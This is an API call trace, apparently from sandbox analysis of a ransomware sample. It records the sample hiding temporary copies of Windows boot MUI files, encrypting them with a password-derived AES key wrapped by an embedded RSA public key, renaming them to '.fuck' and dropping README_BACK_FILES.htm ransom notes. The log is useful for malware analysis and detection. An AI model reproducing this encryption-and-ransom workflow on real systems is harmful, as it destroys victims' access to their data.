1 [0139.139] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0139.140] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0139.140] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27ed988) returned 1 [0139.140] CryptImportPublicKeyInfo (in: hCryptProv=0x27ed988, dwCertEncodingType=0x1, pInfo=0x2800650*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2800680*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2800688*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27ff458) returned 1 [0139.142] CryptEncrypt (in: hKey=0x27ff458, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0139.142] CryptEncrypt (in: hKey=0x27ff458, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27eda98*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27eda98*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0139.142] WriteFile (in: hFile=0x5d54, lpBuffer=0x27eda98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27eda98*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0139.143] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2796778, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0139.143] CryptEncrypt (in: hKey=0x27ff518, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0139.143] WriteFile (in: hFile=0x5d54, lpBuffer=0x2796778*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0139.143] CloseHandle (hObject=0xffffffff) returned 1 [0139.144] CloseHandle (hObject=0x5d54) returned 1 [0139.144] CopyFileA (lpExistingFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0139.149] SetFileAttributesA (lpFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0139.149] DeleteFileA (lpFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.gsg")) returned 1 [0139.150] MoveFileA (lpExistingFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.fuck")) returned 0 [0139.151] CryptDestroyHash (hHash=0x27ff158) returned 1 [0139.151] CryptDestroyKey (hKey=0x27ff518) returned 1 [0139.151] CryptReleaseContext (hProv=0x27ed080, dwFlags=0x0) returned 1 [0139.151] FindNextFileA (in: hFindFile=0x27ff298, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0139.151] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0139.152] GetLastError () returned 0x5 [0139.152] GetFileAttributesA (lpFileName="C:\\\\Boot\\ja-JP\\memtest.exe.mui" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui")) returned 0x20 [0139.152] SetFileAttributesA (lpFileName="C:\\\\Boot\\ja-JP\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0139.152] CreateFileA (lpFileName="C:\\\\Boot\\ja-JP\\memtest.exe.mui" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.152] CreateFileA (lpFileName="C:\\\\Boot\\ja-JP\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0139.153] SetFileAttributesA (lpFileName="C:\\\\Boot\\ja-JP\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0139.154] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27df408) returned 1 [0139.157] CryptCreateHash (in: hProv=0x27df408, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0139.157] lstrlenA (lpString="BklUgDiXcWznHQtJYhpxWlYbzMlQm") returned 29 [0139.157] CryptHashData (hHash=0x27ff058, pbData=0x5bcdb8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0139.157] CryptDeriveKey (in: hProv=0x27df408, Algid=0x6610, hBaseData=0x27ff058, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff358) returned 1 [0139.157] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0139.157] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0139.157] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27ed080) returned 1 [0139.158] CryptImportPublicKeyInfo (in: hCryptProv=0x27ed080, dwCertEncodingType=0x1, pInfo=0x28004b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28004e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28004e8*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27ff018) returned 1 [0139.158] CryptEncrypt (in: hKey=0x27ff018, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0139.158] CryptEncrypt (in: hKey=0x27ff018, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27edc30*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27edc30*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0139.159] WriteFile (in: hFile=0x5d54, lpBuffer=0x27edc30*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27edc30*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0139.160] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2796778, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0139.160] CryptEncrypt (in: hKey=0x27ff358, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0139.160] WriteFile (in: hFile=0x5d54, lpBuffer=0x2796778*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0139.160] CloseHandle (hObject=0xffffffff) returned 1 [0139.160] CloseHandle (hObject=0x5d54) returned 1 [0139.161] CopyFileA (lpExistingFileName="C:\\\\Boot\\ja-JP\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\ja-JP\\memtest.exe.mui" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0139.165] SetFileAttributesA (lpFileName="C:\\\\Boot\\ja-JP\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0139.165] DeleteFileA (lpFileName="C:\\\\Boot\\ja-JP\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui.gsg")) returned 1 [0139.167] MoveFileA (lpExistingFileName="C:\\\\Boot\\ja-JP\\memtest.exe.mui" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\ja-JP\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\ja-jp\\memtest.exe.mui.fuck")) returned 0 [0139.167] CryptDestroyHash (hHash=0x27ff058) returned 1 [0139.167] CryptDestroyKey (hKey=0x27ff358) returned 1 [0139.167] CryptReleaseContext (hProv=0x27df408, dwFlags=0x0) returned 1 [0139.167] FindNextFileA (in: hFindFile=0x27ff298, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0139.167] FindClose (in: hFindFile=0x27ff298 | out: hFindFile=0x27ff298) returned 1 [0139.167] GetFileAttributesA (lpFileName="C:\\\\Boot\\ja-JP\\README_BACK_FILES.htm" (normalized: "c:\\boot\\ja-jp\\readme_back_files.htm")) returned 0xffffffff [0139.167] AreFileApisANSI () returned 1 [0139.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d440, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0139.168] CreateFileW (lpFileName="C:\\\\Boot\\ja-JP\\README_BACK_FILES.htm" (normalized: "c:\\boot\\ja-jp\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0139.267] GetFileType (hFile=0x5d50) returned 0x1 [0139.267] WriteFile (in: hFile=0x5d50, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0139.268] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0139.268] FindFirstFileA (in: lpFileName="C:\\\\Boot\\ko-KR\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x27fef58 [0139.269] FindNextFileA (in: hFindFile=0x27fef58, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0139.269] FindNextFileA (in: hFindFile=0x27fef58, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0139.269] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0139.269] GetLastError () returned 0x0 [0139.269] GetFileAttributesA (lpFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui")) returned 0x20 [0139.270] SetFileAttributesA (lpFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0139.270] CreateFileA (lpFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.270] CreateFileA (lpFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0139.271] SetFileAttributesA (lpFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0139.271] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27edd40) returned 1 [0139.273] CryptCreateHash (in: hProv=0x27edd40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0139.273] lstrlenA (lpString="BklUgDiXcWznHQtJYhpxWlYbzMlQm") returned 29 [0139.273] CryptHashData (hHash=0x27ff298, pbData=0x5bd010, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0139.274] CryptDeriveKey (in: hProv=0x27edd40, Algid=0x6610, hBaseData=0x27ff298, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff1d8) returned 1 [0139.274] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0139.274] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0139.274] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27df408) returned 1 [0139.274] CryptImportPublicKeyInfo (in: hCryptProv=0x27df408, dwCertEncodingType=0x1, pInfo=0x2800e70*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2800ea0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2800ea8*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27ff418) returned 1 [0139.274] CryptEncrypt (in: hKey=0x27ff418, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0139.274] CryptEncrypt (in: hKey=0x27ff418, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2803c40*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x2803c40*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0139.275] WriteFile (in: hFile=0x5d54, lpBuffer=0x2803c40*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2803c40*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0139.276] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2796778, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0139.276] CryptEncrypt (in: hKey=0x27ff1d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0139.276] WriteFile (in: hFile=0x5d54, lpBuffer=0x2796778*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0139.276] CloseHandle (hObject=0xffffffff) returned 1 [0139.276] CloseHandle (hObject=0x5d54) returned 1 [0139.277] CopyFileA (lpExistingFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0139.281] SetFileAttributesA (lpFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0139.282] DeleteFileA (lpFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.gsg")) returned 1 [0139.283] MoveFileA (lpExistingFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.fuck")) returned 0 [0139.283] CryptDestroyHash (hHash=0x27ff298) returned 1 [0139.283] CryptDestroyKey (hKey=0x27ff1d8) returned 1 [0139.283] CryptReleaseContext (hProv=0x27edd40, dwFlags=0x0) returned 1 [0139.283] FindNextFileA (in: hFindFile=0x27fef58, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0139.284] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0139.284] GetLastError () returned 0x5 [0139.284] GetFileAttributesA (lpFileName="C:\\\\Boot\\ko-KR\\memtest.exe.mui" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui")) returned 0x20 [0139.284] SetFileAttributesA (lpFileName="C:\\\\Boot\\ko-KR\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0139.284] CreateFileA (lpFileName="C:\\\\Boot\\ko-KR\\memtest.exe.mui" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.284] CreateFileA (lpFileName="C:\\\\Boot\\ko-KR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0139.285] SetFileAttributesA (lpFileName="C:\\\\Boot\\ko-KR\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0139.285] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2803bb8) returned 1 [0139.288] CryptCreateHash (in: hProv=0x2803bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0139.288] lstrlenA (lpString="BklUgDiXcWznHQtJYhpxWlYbzMlQm") returned 29 [0139.288] CryptHashData (hHash=0x27ff4d8, pbData=0x5bcf98, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0139.288] CryptDeriveKey (in: hProv=0x2803bb8, Algid=0x6610, hBaseData=0x27ff4d8, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27fefd8) returned 1 [0139.288] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0139.288] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0139.288] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x28036f0) returned 1 [0139.288] CryptImportPublicKeyInfo (in: hCryptProv=0x28036f0, dwCertEncodingType=0x1, pInfo=0x2800580*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28005b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28005b8*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27ff2d8) returned 1 [0139.288] CryptEncrypt (in: hKey=0x27ff2d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0139.288] CryptEncrypt (in: hKey=0x27ff2d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2804108*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x2804108*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0139.289] WriteFile (in: hFile=0x5d54, lpBuffer=0x2804108*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2804108*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0139.290] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2796778, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0139.290] CryptEncrypt (in: hKey=0x27fefd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0139.290] WriteFile (in: hFile=0x5d54, lpBuffer=0x2796778*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0139.290] CloseHandle (hObject=0xffffffff) returned 1 [0139.290] CloseHandle (hObject=0x5d54) returned 1 [0139.295] CopyFileA (lpExistingFileName="C:\\\\Boot\\ko-KR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\ko-KR\\memtest.exe.mui" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0139.300] SetFileAttributesA (lpFileName="C:\\\\Boot\\ko-KR\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0139.301] DeleteFileA (lpFileName="C:\\\\Boot\\ko-KR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui.gsg")) returned 1 [0139.302] MoveFileA (lpExistingFileName="C:\\\\Boot\\ko-KR\\memtest.exe.mui" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\ko-KR\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui.fuck")) returned 0 [0139.302] CryptDestroyHash (hHash=0x27ff4d8) returned 1 [0139.302] CryptDestroyKey (hKey=0x27fefd8) returned 1 [0139.302] CryptReleaseContext (hProv=0x2803bb8, dwFlags=0x0) returned 1 [0139.302] FindNextFileA (in: hFindFile=0x27fef58, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0139.302] FindClose (in: hFindFile=0x27fef58 | out: hFindFile=0x27fef58) returned 1 [0139.302] GetFileAttributesA (lpFileName="C:\\\\Boot\\ko-KR\\README_BACK_FILES.htm" (normalized: "c:\\boot\\ko-kr\\readme_back_files.htm")) returned 0xffffffff [0139.303] AreFileApisANSI () returned 1 [0139.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d600, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0139.303] CreateFileW (lpFileName="C:\\\\Boot\\ko-KR\\README_BACK_FILES.htm" (normalized: "c:\\boot\\ko-kr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0139.304] GetFileType (hFile=0x5d50) returned 0x1 [0139.305] WriteFile (in: hFile=0x5d50, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0139.306] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0139.306] FindFirstFileA (in: lpFileName="C:\\\\Boot\\lt-LT\\*.*", 